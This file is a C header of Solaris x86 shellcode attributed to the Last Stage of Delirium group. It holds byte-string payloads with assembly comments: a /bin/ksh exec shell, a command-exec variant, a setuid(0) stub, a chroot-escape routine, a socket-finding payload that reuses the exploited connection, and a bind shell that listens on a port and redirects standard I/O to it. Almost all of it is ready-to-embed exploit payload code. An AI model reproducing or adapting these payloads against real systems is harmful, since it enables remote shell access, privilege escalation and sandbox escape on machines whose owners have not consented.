/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for solaris 2.6 2.7 2.8 x86                                    #*/

/*
syscall     %eax stack
----------- ---- ---------------------------------------------------------------
exec        x00b ret,->path="/bin/ksh",->[->a0=path,0]
exec        x00b ret,->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
setuid      x017 ret,uid=0
mkdir       x050 ret,->path="b..",mode= (each value is valid)
chroot      x03d ret,->path={"b..","."}
chdir       x00c ret,->path=".."
ioctl       x036 ret,sfd,TI_GETPEERNAME=0x5491,->[mlen=0x91,len=0x91,->sadr=[]]
so_socket   x0e6 ret,AF_INET=2,SOCK_STREAM=2,prot=0,devpath=0,SOV_DEFAULT=1
bind        x0e8 ret,sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],len=0x10,SOV_SOCKSTREAM=2
listen      x0e9 ret,sfd,backlog=5,vers= (not required in this syscall)
accept      x0ea ret,sfd,0,0,vers= (not required in this syscall)
fcntl       x03e ret,sfd,F_DUP2FD=0x09,fd={0,1,2}
*/

#if defined(X86) && defined(SOLARIS)

char _shellcode[]=         /* 33+8 bytes                     */
    "\xeb\x1a"             /* jmp     <shellcode+28>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),%edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\x83\xef\x3b"         /* subl    $0x3b,%edi             */
    "\xb0\x9a"             /* movb    $0x9a,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xb0\x07"             /* movb    $0x07,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xe8\xe1\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;

char syscallcode[]=        /* 26 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xeb\x09"             /* jmp     <syscallcode+13>       */
    "\x5f"                 /* popl    %edi                   */
    "\x57"                 /* pushl   %edi                   */
    "\x47"                 /* incl    %edi                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xaa"                 /* stosb   %al,%es:(%edi)         */
    "\x5e"                 /* popl    %esi                   */
    "\xeb\x0d"             /* jmp     <syscallcode+26>       */
    "\xe8\xf2\xff\xff\xff" /* call    <syscallcode+4>        */
    "\x9a\xff\xff\xff\xff"
    "\x07\xff"
    "\xc3"                 /* ret                            */
;

char shellcode[]=          /* 25+8 bytes                     */
    "\xeb\x12"             /* jmp     <shellcode+20>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),edi         */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe8\xe9\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;

char cmdshellcode[]=       /* 36+12+cmdlen bytes             */
    "\xeb\x1d"             /* jmp     <cmdshellcode+31>      */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\xac"         /* leal    -0x44(%eax),edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\x88\x50\x08"         /* movb    %dl,0x8(%eax)          */
    "\x88\x50\x0b"         /* movb    %dl,0xb(%eax)          */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x8d\x40\x09"         /* leal    0x09(%eax),%eax        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x8d\x40\x03"         /* leal    0x03(%eax),%eax        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe8\xde\xff\xff\xff" /* call    <cmdshellcode+2>       */
    "/bin/ksh -c "
    /* command */
;

char setuidcode[]=         /* 7 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xff\xd6"             /* call    *%esi                  */
;

char chrootcode[]=         /* 40 bytes                       */
    "\x68""b..."           /* pushl   $0x2e2e2e62            */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x88\x47\x03"         /* movb    %al,0x3(%edi)          */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x50"             /* movb    $0x50,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x47"                 /* incl    %edi                   */
    "\x33\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl              */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x0c"             /* movb    $0x0c,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe2\xfa"             /* loop    <chrootcode+28>        */
    "\x47"                 /* incl    %edi                   */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\xff\xd6"             /* call    *%esi                  */
;

char findsckcode[]=        /* 67 bytes                       */
    "\x56"                 /* pushl   %esi                   */
    "\x5f"                 /* popl    %edi                   */
    "\x83\xef\x7c"         /* subl    $0x7c,%edi             */
    "\x57"                 /* pushl   %edi                   */
    "\x8d\x4f\x10"         /* leal    0x10(%edi),%ecx        */
    "\xb0\x91"             /* movb    $0x91,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x95"                 /* xchgl   %eax,%ebp              */
    "\xb5\x54"             /* movb    $0x54,%ch              */
    "\x51"                 /* pushl   %ecx                   */
    "\x66\xb9\x01\x01"     /* movw    $0x0101,%cx            */
    "\x51"                 /* pushl   %ecx                   */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x36"             /* movb    $0x36,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x59"                 /* popl    %ecx                   */
    "\x33\xdb"             /* xorl    %ebx,%ebx              */
    "\x3b\xc3"             /* cmpl    %ebx,%eax              */
    "\x75\x0a"             /* jne     <findsckcode+47>       */
    "\x66\xbb\x12\x34"     /* movw    $0x1234,%bx            */
    "\x66\x39\x5d\x02"     /* cmpw    %bx,0x2(%ebp)          */
    "\x74\x02"             /* je      <findsckcode+49>       */
    "\xe2\xe6"             /* loop    <findsckcode+23>       */
    "\x6a\x09"             /* pushb   $0x09                  */
    "\x51"                 /* pushl   %ecx                   */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x89\x4c\x24\x08"     /* movl    %ecx,0x8(%esp)         */ 
    "\x41"                 /* incl    %ecx                   */
    "\xb0\x3e"             /* movb    $0x3e,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe2\xf4"             /* loop    <findsckcode+55>       */
;

char bindsckcode[]=        /* 73 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x68\xff\x02\x12\x34" /* pushl   $0x341202ff            */
    "\x89\xe7"             /* movl    $esp,%edi              */
    "\x40"                 /* incl    %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x48"                 /* decl    %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x02"             /* movb    $0x02,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\xe6"             /* movb    $0xe6,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x8b\xd8"             /* movl    %eax,%ebx              */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x89\x47\x04"         /* movl    %eax,0x4(%edi)         */
    "\x6a\x10"             /* pushb   $0x10                  */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\xe8"             /* movb    $0xe8,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x6a\x05"             /* pushb   $0x05                  */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\xe9"             /* movb    $0xe9,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\xea"             /* movb    $0xea,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x8b\xd8"             /* movl    %eax,%ebx              */
    "\x6a\x09"             /* pushb   $0x09                  */
    "\x53"                 /* pushl   %ebx                   */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x89\x4c\x24\x08"     /* movl    %ecx,0x8(%esp)         */ 
    "\x41"                 /* incl    %ecx                   */
    "\xb0\x3e"             /* movb    $0x3e,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe2\xf4"             /* loop    <bindsckcode+61>       */
;

char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;

#define FINDSCKPORTOFS     39
#define BINDSCKPORTOFS     05

#endif
